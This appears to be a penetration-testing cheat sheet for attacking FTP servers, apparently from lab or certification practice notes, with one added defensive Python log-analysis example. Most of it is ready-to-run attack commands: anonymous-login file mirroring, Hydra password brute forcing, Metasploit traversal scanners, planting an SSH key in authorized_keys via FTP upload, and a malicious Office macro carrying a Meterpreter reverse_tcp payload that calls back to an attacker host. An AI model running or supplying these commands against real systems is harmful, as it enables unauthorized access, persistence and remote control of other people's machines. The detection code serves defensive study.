FTP 21
checklist
Anonymous login
OS version
Other software: Check Program Files, yum.log, /bin
Password files
DLLs: Use for msfpescan / BOF targets
Upload potential: Do you have the ability to upload files?
Can you trigger execution of uploads?
Swap binaries
Public exploits: Check for any public exploits for FTP server software
Download All Directories and Files
Mirror FTP directories with anonymous login:
wget --mirror 'ftp://ftp_user:redcliff@10.10.10.59'
If PASV transfer is disabled:
wget --no-passive-ftp --mirror 'ftp://anonymous:anonymous@10.10.10.98'
If PASV is enabled:
sudo wget --mirror 'ftp://anonymous:anonymous@10.11.1.14'
FTP Information Gathering
Grab FTP Banner via telnet:
telnet -n 192.168.101.100 21
Grab FTP Certificate if available:
openssl s_client -connect 192.168.101.100:21 -starttls ftp
Nmap FTP scan:
Scan FTP with scripts:
nmap --script "ftp-*" -p 21 192.168.101.100
Basic FTP scan with version detection:
nmap -sC -sV 192.168.101.162 --script=ftp-anon
Alternative (without brute forcing):
nmap -p 21 --script="+ftp and not brute and not dos and not fuzzer" -vv -oN ftp $ip
Connect with Browser:
ftp://anonymous:anonymous@192.168.101.100
Brute Force FTP Login
Hydra Brute Force (Need Username):
hydra -t 1 -l motherfucker -P rockyou.txt -vV 192.168.101.100 ftp
Hydra with Sparta custom list (Requires Sparta tool):
hydra -s 21 -C /usr/share/sparta/wordlists/ftp-default-userpass.txt -u -f $ip ftp
Msfconsole FTP scanning:
msfconsole -q -x 'use auxiliary/scanner/ftp/anonymous; set RHOSTS {IP}; set RPORT 21; run; exit'
msfconsole -q -x 'use auxiliary/scanner/ftp/ftp_version; set RHOSTS {IP}; set RPORT 21; run; exit'
msfconsole -q -x 'use auxiliary/scanner/ftp/bison_ftp_traversal; set RHOSTS {IP}; set RPORT 21; run; exit'
msfconsole -q -x 'use auxiliary/scanner/ftp/colorado_ftp_traversal; set RHOSTS {IP}; set RPORT 21; run; exit'
msfconsole -q -x 'use auxiliary/scanner/ftp/titanftp_xcrc_traversal; set RHOSTS {IP}; set RPORT 21; run; exit'
SSH Key Deployment via FTP
Generate SSH key:
ssh-keygen
Upload SSH key via FTP:
ftp 10.10.10.10
Log in as anonymous:anonymous, then:
put /root/.ssh/id_rsa.pub authorized_keys
SSH into target:
ssh user@10.10.10.10
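Defender-side view of the brute-force and SSH key upload steps above, as an added example that is not part of the original notes: Python detection logic run over FTP server log lines. It assumes vsftpd's vsftpd.log line format; the sample lines, rule names and failure threshold are constructed for illustration.

```python
import re
from collections import Counter

# Constructed sample in vsftpd.log style (assumed format; documentation IP ranges).
SAMPLE_LOG = "".join(
    f'Tue Mar  5 10:01:0{i} 2024 [pid 210{i}] [admin] FAIL LOGIN: Client "203.0.113.7"\n'
    for i in range(5)
) + '''\
Tue Mar  5 10:04:11 2024 [pid 2200] [alice] OK LOGIN: Client "192.0.2.10"
Tue Mar  5 10:05:30 2024 [pid 2231] [ftp] OK LOGIN: Client "198.51.100.9", anon password "a@b"
Tue Mar  5 10:05:41 2024 [pid 2233] [ftp] OK UPLOAD: Client "198.51.100.9", "/pub/notes.txt", 120 bytes, 1.10Kbyte/sec
Tue Mar  5 10:05:52 2024 [pid 2233] [ftp] OK UPLOAD: Client "198.51.100.9", "/.ssh/authorized_keys", 571 bytes, 3.20Kbyte/sec
'''

LINE = re.compile(
    r'\[pid \d+\] \[(?P<user>[^\]]+)\] (?P<status>OK|FAIL) (?P<event>[A-Z]+): '
    r'Client "(?P<client>[^"]+)"(?:, "(?P<path>[^"]+)")?'
)
KEY_FILE = re.compile(r'(^|/)authorized_keys2?$')  # SSH trust files by basename
ANON_USERS = {"ftp", "anonymous"}                  # how anonymous sessions are logged


def analyze(log_text, fail_threshold=5):
    """Return (rule, client, detail) findings in log order."""
    findings, fails = [], Counter()
    for line in log_text.splitlines():
        m = LINE.search(line)
        if not m:
            continue  # not a session event line
        user, status, event, client, path = m.group(
            "user", "status", "event", "client", "path")
        if event == "LOGIN" and status == "FAIL":
            fails[client] += 1
            if fails[client] == fail_threshold:  # alert once per client
                findings.append(("brute-force", client,
                                 f"{fail_threshold} failed logins"))
        elif event == "LOGIN" and user in ANON_USERS:
            findings.append(("anonymous-login", client, user))
        elif event == "UPLOAD" and status == "OK":
            if KEY_FILE.search(path or ""):
                findings.append(("ssh-key-upload", client, path))
            elif user in ANON_USERS:
                findings.append(("anonymous-upload", client, path))
    return findings


if __name__ == "__main__":
    for finding in analyze(SAMPLE_LOG):
        print(finding)
```

Any ssh-key-upload finding means the FTP root overlaps a user's home or .ssh directory, which is the condition to remove on the server side.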
FTP Passive Mode Detection
Passive mode at login: Indicates potential presence of a firewall in the system.
Exploiting MS Office Evil Macros
First Stage: Set up Reverse Shell
Search for Office macro:
msfconsole
search office macro
use exploit/multi/fileformat/office_word_macro
Set up Meterpreter reverse listener:
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.119.177
set disablepayloadhandler false
run
Second Stage: Upload and Execute Macro
Change file extension:
sudo mv msf.docm msf.doc
Start Meterpreter listener:
set payload windows/meterpreter/reverse_tcp
set exitonsession false
set lhost 192.168.119.177
set lport 4444
run -j
Upload via FTP:
ftp 10.10.10.10 21
put msf.doc
exit
Catch Meterpreter session.